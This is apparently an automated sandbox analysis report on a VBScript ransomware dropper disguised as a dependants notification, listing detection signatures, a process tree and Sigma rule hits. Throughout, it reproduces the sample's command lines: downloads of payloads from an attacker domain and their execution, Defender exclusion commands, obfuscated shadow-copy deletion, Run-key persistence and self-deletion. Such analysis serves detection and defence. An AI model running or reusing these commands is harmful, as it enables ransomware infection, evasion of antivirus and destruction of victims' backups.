Edit tour

Windows Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs

Overview

General Information

Sample name:	NOTIFICATION_OF_DEPENDANTS.vbs
Analysis ID:	1578028
MD5:	78d392dbb4dacec38ea4f6efaeb62797
SHA1:	f2766170575b017fe801c4c98d58dfa1baf0818b
SHA256:	8dfebd7977251503d34f06b75d8b76a518c6f07ef52e3724aed9c3d9158a662e
Tags:	CactusRansomwarevbsuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sigma detected: Delete shadow copy via WMIC

VBScript performs obfuscated calls to suspicious functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Deletes shadow drive data (may be related to ransomware)

Loading BitLocker PowerShell Module

May encrypt documents and pictures (Ransomware)

Modifies existing user documents (likely ransomware behavior)

Overwrites Mozilla Firefox settings

Powershell drops PE file

Sigma detected: Control Panel Items

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation STDIN+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Sigma detected: Suspicious Ping/Del Command Combination

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8124 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)

chrome.exe (PID: 7376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cmd.exe (PID: 5284 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6276 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5408 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

control.exe (PID: 7848 cmdline: control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)

rundll32.exe (PID: 7968 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 8044 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 1044 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2440 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 8388 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8440 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 8612 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

eryy65ty.exe (PID: 8660 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 2B986178DA0C3D081F99AC8FB4A5952C)

WMIC.exe (PID: 9108 cmdline: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 9212 cmdline: c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 9200 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 3896 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)

svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

eryy65ty.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)

WMIC.exe (PID: 8392 cmdline: c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1980 cmdline: c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5680 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 1176 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)

eryy65ty.exe (PID: 9104 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)

WMIC.exe (PID: 3656 cmdline: c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3756 cmdline: c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3820 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 4956 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)

notepad.exe (PID: 6192 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Sigma Signatures

Operating System Destruction

Sigma detected: Delete shadow copy via WMIC

Source: Process started

Author: Joe Security: Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe

System Summary

Sigma detected: Control Panel Items

Source: Process started

Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): Data: Command: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5284, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 6276, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation STDIN+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8044, ParentProcessName: rundll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 1044, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe.Rd_03.Qd_.R.T.e..eH.....Y$....g "#.S@S0".3..83.3c/.S/F^".0#.3..3.->^..S/}/.3.3.3.3.3...f 3./.30,3.-083.-0\3J(0.^.3r0...35).-.`S.S.^<-<-.l3.3.-.^.3).....3^S..g..3.3T5..3.S...U<-., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Source: Process started

Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe

Sigma detected: Suspicious Ping/Del Command Combination

Source: Process started

Author: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", ProcessId: 9200, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 7716, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe.Rd_03.Qd_.R.T.e..eH.....Y$....g "#.S@S0".3..83.3c/.S/F^".0#.3..3.->^..S/}/.3.3.3.3.3...f 3./.30,3.-083.-0\3J(0.^.3r0...35).-.`S.S.^<-<-.l3.3.-.^.3).....3^S..g..3.3T5..3.S...U<-., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 7716, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, 